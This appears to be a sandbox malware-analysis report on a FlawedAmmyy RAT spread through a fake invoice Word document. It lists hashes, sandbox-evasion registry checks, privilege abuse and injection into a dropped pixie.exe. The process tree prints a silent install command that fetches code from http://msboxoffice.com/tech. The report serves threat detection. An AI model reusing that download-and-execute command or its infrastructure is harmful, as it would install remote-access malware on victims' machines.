flawedammyy | 222e883d6896effdd0f0b5849269483874e1e308dab3d6f49599c398ca4d8c31

General

Target

Invoice_ 69010.16_10.doc
Size

77KB
MD5

a8eda3039c4cbbb362eb5847ed38e37a
SHA1

a1dca8f8ca13895aa9eb84456c7a2a92e1457e27
SHA256

e006216019968c4bcdf3a7962842ed9200927f17578bcc45ea65e77955b6fd3f
SHA512

9792974f387a872d04be16d35b9f2de407926000d0781c0dda569021e531fe0d57217a9bfb4d3cb60f2c038e24c4456a8c98ae1a8e5ffc019d776ed23d9e7ded
SSDEEP

768:dD3bcTOAe/uqeX61y7PDqfgljPOs+jNWNA4H7dLuVXBk0KEzt6ePrMBfr:tsO5ucuqIljPOs+jH8VuVXBki8ezy

Score

10^/10

flawedammyy trojan

Malware Config

Signatures

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Executes dropped EXE 1 IoCs

Processes:

pixie.exe

pid process

2160 pixie.exe

pid	process
2160	pixie.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2524 WINWORD.EXE
2524 WINWORD.EXE

pid	process
2524	WINWORD.EXE
2524	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

pixie.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	2160	pixie.exe
Token: SeIncreaseQuotaPrivilege	2160	pixie.exe
Token: SeSecurityPrivilege	4960	msiexec.exe
Token: SeCreateTokenPrivilege	2160	pixie.exe
Token: SeAssignPrimaryTokenPrivilege	2160	pixie.exe
Token: SeLockMemoryPrivilege	2160	pixie.exe
Token: SeIncreaseQuotaPrivilege	2160	pixie.exe
Token: SeMachineAccountPrivilege	2160	pixie.exe
Token: SeTcbPrivilege	2160	pixie.exe
Token: SeSecurityPrivilege	2160	pixie.exe
Token: SeTakeOwnershipPrivilege	2160	pixie.exe
Token: SeLoadDriverPrivilege	2160	pixie.exe
Token: SeSystemProfilePrivilege	2160	pixie.exe
Token: SeSystemtimePrivilege	2160	pixie.exe
Token: SeProfSingleProcessPrivilege	2160	pixie.exe
Token: SeIncBasePriorityPrivilege	2160	pixie.exe
Token: SeCreatePagefilePrivilege	2160	pixie.exe
Token: SeCreatePermanentPrivilege	2160	pixie.exe
Token: SeBackupPrivilege	2160	pixie.exe
Token: SeRestorePrivilege	2160	pixie.exe
Token: SeShutdownPrivilege	2160	pixie.exe
Token: SeDebugPrivilege	2160	pixie.exe
Token: SeAuditPrivilege	2160	pixie.exe
Token: SeSystemEnvironmentPrivilege	2160	pixie.exe
Token: SeChangeNotifyPrivilege	2160	pixie.exe
Token: SeRemoteShutdownPrivilege	2160	pixie.exe
Token: SeUndockPrivilege	2160	pixie.exe
Token: SeSyncAgentPrivilege	2160	pixie.exe
Token: SeEnableDelegationPrivilege	2160	pixie.exe
Token: SeManageVolumePrivilege	2160	pixie.exe
Token: SeImpersonatePrivilege	2160	pixie.exe
Token: SeCreateGlobalPrivilege	2160	pixie.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid process

2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
2524 WINWORD.EXE
Suspicious use of WriteProcessMemory 2 IoCs

Processes:

WINWORD.EXE

description pid process target process

PID 2524 wrote to memory of 2160 2524 WINWORD.EXE pixie.exe
PID 2524 wrote to memory of 2160 2524 WINWORD.EXE pixie.exe

pid	process
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE
2524	WINWORD.EXE

description	pid	process	target process
PID 2524 wrote to memory of 2160	2524	WINWORD.EXE	pixie.exe
PID 2524 wrote to memory of 2160	2524	WINWORD.EXE	pixie.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice_ 69010.16_10.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2524
- C:\Users\Admin\AppData\Local\Temp\pixie.exe
  "C:\Users\Admin\AppData\Local\Temp\pixie.exe" /norestart /q /i http://msboxoffice.com/tech
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2160

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDEFEC.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\pixie.exe

Filesize
68KB

MD5
e5da170027542e25ede42fc54c929077

SHA1
5d6102f5a170e982c7735bfc2b9c1a0a0d435fd1

SHA256
0a8797d088023a7f17bb00b22ff7c91036070cca561bff5337c472313c0cb4ad

SHA512
c7595c3770d743229cea4e56d0191535b92f280f98bdad9c21606aacb7f4dcbefeab9bf8c22836059b56a4abdb839ed7aad2f855e34effbf508e392e9b4029a4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
68f66eda70f9e2ba5c5d8b7b3e234519

SHA1
de694b4a7df2227259e0c71c0da9c98f7aeff6a5

SHA256
9a50085e124038dc7bd020d558062d67a6f8fe1f0ea2df0f36c06fa21148b9db

SHA512
773652f710fc3ee6a95e8a70282efaf6c5b626081fe476b431d7ee983662f29bedcbfa2cbd16780c5cc18d757237090bdbb6242b20187acb968a1c2216c0b8b6

Download Submit
memory/2524-17-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-6-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-2-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-14-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-8-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-13-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-10-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-9-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-12-0x00007FFB82010000-0x00007FFB82020000-memory.dmp

Filesize
64KB

Download
memory/2524-7-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-15-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-18-0x00007FFB82010000-0x00007FFB82020000-memory.dmp

Filesize
64KB

Download
memory/2524-19-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-21-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-20-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-1-0x00007FFBC448D000-0x00007FFBC448E000-memory.dmp

Filesize
4KB

Download
memory/2524-223-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-3-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-11-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-34-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-38-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-5-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-70-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-71-0x00007FFBC448D000-0x00007FFBC448E000-memory.dmp

Filesize
4KB

Download
memory/2524-72-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-73-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-4-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-82-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-83-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-0-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-222-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-225-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-224-0x00007FFB84470000-0x00007FFB84480000-memory.dmp

Filesize
64KB

Download
memory/2524-16-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download
memory/2524-226-0x00007FFBC43F0000-0x00007FFBC45E5000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads